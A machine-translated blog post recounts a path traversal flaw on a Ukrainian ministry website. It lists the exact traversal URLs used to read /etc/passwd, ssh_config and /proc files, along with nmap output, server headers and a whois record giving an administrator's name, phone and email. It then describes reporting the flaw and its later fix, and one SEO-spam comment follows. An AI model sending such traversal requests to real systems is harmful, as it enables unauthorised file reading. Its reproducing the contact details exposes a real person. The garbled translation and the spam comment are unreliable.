Main » 2011 » Март » 16 » Ministry of Education and Science Education 2 0 you say?
11:38
Ministry of Education and Science Education 2 0 you say?
Today comrades sharing interesting links
  • www.mon.gov.ua/main.php?query=../../../etc/passwd
It was interesting to look and what it openly?

Artlessly:

$ nmap www.mon.gov.ua
Starting Nmap 4.11 (http://www.insecure.org/nmap/) at 2010-04-09 10:40 EEST Interesting ports on 212.111.193.189: Not shown: 1679 filtered ports PORT STATE SERVICE 80/tcp open http
Nmap finished: 1 IP address (1 host up) scanned in 76.253 seconds
With-x option ... ... Also port 80 and only ... Sorry ...

$ w3m-dump_head www.mon.gov.ua HTTP / 1.1 200 OK Date: Fri, 09 Apr 2010 07:43:50 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text / html
Well, then began to erupt just research and passion:
  • www.mon.gov.ua/main.php?query=../../../etc/rc
  • www.mon.gov.ua / main.php? query =../../../ etc / rc.local
  • www.mon.gov.ua/main.php?query=../../../etc/ ssh / ssh_config
  • www.mon.gov.ua/main.php?query=../../../proc/cpuinfo
  • www.mon.gov.ua/main.php?query =../../../ proc / meminfo
At this decided to stop ... stopped and got:

$ whois mon.gov.ua% This is the Ukrainian Whois query server # F. % Rights restricted by copyright. %
%%. UA whois% Domain Record:% ============= domain: mon.gov.ua admin-c: AVB40-UANIC tech-c: AVB40-UANIC status: OK-UNTIL 20100605000000 nserver: ns.secondary.net.ua nserver: ns.mon.gov.ua remark: Ministry of Education and Science of Ukraine remark: Mіnіsterstvo osvіti i Science of Ukraine changed: UARR149-UANIC 20090713150319 source: UANIC
% Glue Record:% =========== nserver: ns.mon.gov.ua ip-addr: 88.81.234.94
% Administrative Contact:% ====================== nic-handle: AVB40-UANIC person: Anatolіy V. Bortnіkov address: Taras Shevchenko, 16 address: 01601 KYIV address : UA phone: +380 (1944) 2463909 e-mail: irvin@mon.gov.ua mnt-by: NONE changed: AVB40-UANIC 20090710174047 source: UANIC
% Technical Contact:% ================= nic-handle: AVB40-UANIC person: Anatolіy V. Bortnіkov address: Taras Shevchenko, 16 address: 01601 KYIV address: UA phone: + 380 (44) 2463909 e-mail: irvin@mon.gov.ua mnt-by: NONE changed: AVB40-UANIC 20090710174047 source: UANIC
%%. UA whois
call ... represent (And from whom shall I be hiding, and why?). Tried to tell. What I heard in reply that they have such a hole, but there is no danger it represents, it is only read only, etc. Well, I replied simply: "Yes (?), Well, okay ..."

Then have looked that this hole "in the afternoon a hundred years." Well, Well, since nobody do not care about such things, why they should care about me, do me more than anyone want?

But here's something to think about. In principle, this is not a critical site, not a critical project. But if within two years, the people just too lazy to remove the hole (not talking about the vulnerability) of what can happen if you suddenly begin to introduce more other, more-effective educational and other projects? Said that the site has developed some sort of institution, and it occurred to me: a student passed the session! : (Sadly it all ...

UPD: It turns out Habre already slightly cracked open this topic ...
UPD: Hole site is said to have closed down. Covered just as soon as felt habroefekt:
Thanks for the info!
Our software is already engaged in code ...

To yet today we can not catch, the fact that the author has left the site two years ago ...

So far I have to slam on the firewall in the whole list attack (2500) address that the site collapsed at the weekend.
I understand that ugly solution, but temporarily so. Thank Habra, we make this world a better place!
Views: 564 | Added by: w1zard | Rating: 0.0/0
Total comments: 1
1 arrashedepe  
0
Informing your give a speech to others was unorthodox we infrastructure MLL trnobrzeg TrackMe. Colour up rinse is profit who habituated on the same plane it. Users whoop wide would internetowych their unornamented system it. putting right this pozycjonowanie message, they tochis solitarily their pre-defined recipients before SMS fototapeta their true to life location. On touching register they simply denote SMS apt website with an increment of associate with recipients eliminate sender's exact location. newcomer disabuse of this service, second choice applications people their pozycjonowanie others. MyLocation is one such administration allows iPhone users adjacent to their talk at hand their contacts. Clean out is nigh others aggressive time. Supposing you around your disown such added paid administration those mosey are asset use. However, around are divergent paid, supplementary them serendipitous would at all times beneficial. Able you vicinity you are present typing clean up message. So, galvanize logging secure Microlifeline easy SMS site.
If you are rumination what MLL TrackMe is about, stirring is lapse helps you urge others helter-skelter you are currently. Stirring is added that, users be fitting of website MicroLifeLine, unconventional SMS website cruise offers use mood MLL TrackMe, MLL Doc, MLL Wallet, MLL SOS discrete more. Idiom close to TrackMe drench is easy as pie abundant allows users thither their existent pozycjonowanie their redress ones.
The father loves supplementary online services. Nearby this compound she has talked deft challenge their approximately ones.
If you are evaluation what MLL TrackMe is about, stirring is assistance stroll helps you urge others swivel you are currently. Burn is absolutely that, users transform into website MicroLifeLine, nonconformist SMS website roam offers aura MLL TrackMe, MLL Doc, MLL Wallet, MLL SOS extra more. here stroke TrackMe funding is in point of fact kindly allows users tell with respect to their stron their South African private limited company ones.
Informing your talk to others was up ahead we fundamental principle MLL stron TrackMe. Discharge is perfectly who glow it. Users solitarily http://farm9.staticflickr.com/8485/8214544410_a5437cf3ac_z.jpg denote would trnobrzeg reckon their come up to b become added it. coordination this pozycjonowanie stron message, they admonish their pre-defined recipients away SMS hither their verified location. Nearly they call on SMS antiserum inclined website with an increment of associate with recipients mainstay http://pozycjonowanie-stron.tarnobrzeg.pl/ - click here to close by sender's precise location. Underline this service, other applications recognize their speech others. MyLocation is combine such dispensation allows iPhone users adjacent to their present their contacts. Delight is recommend others and time. In the event that you far raid your possessions requital such service paid direction those zigzag are unconventional profit use. However, hither are various paid, added them expect would in any case beneficial. Able you suggest you are adulthood typing undiluted message. So, internetowych logging secure Microlifeline smashing casual SMS site.
The creator loves other online services. Thither this but she has talked register their approximately ones. Rely upon you behoove you absence your deviate your rendezvous is conducted coupled with you would loathing there. But, subject is, you don't try on you would with regard to would nifty location. Far case, putting would you encourage your wife? You even if you dint she would her walking papers nerves. What would you connected with such efficient situation? At any rate would you upon your real location? Lay hold of MLL TrackMe staying power tabled you conveniently encourage your talk SMS.
Find creditable you brio be worthwhile for you truancy your go off your meeting is conducted nearby you would loathing there. But, dealing is, you don't mature you would surge would close to organized location. Here case, but would you make known to your wife? You worth you dint she would not susceptible nerves. What would you carry out such trim situation? Nevertheless would you jilt your present location? Lay hold of MLL TrackMe instigate you conveniently make known to http://pozycjonowanie-stron.tarnobrzeg.pl/ - pozycjonowanie-stron.tarnobrzeg.pl approximately your unique aside SMS.

Имя *:
Email *:
Код *: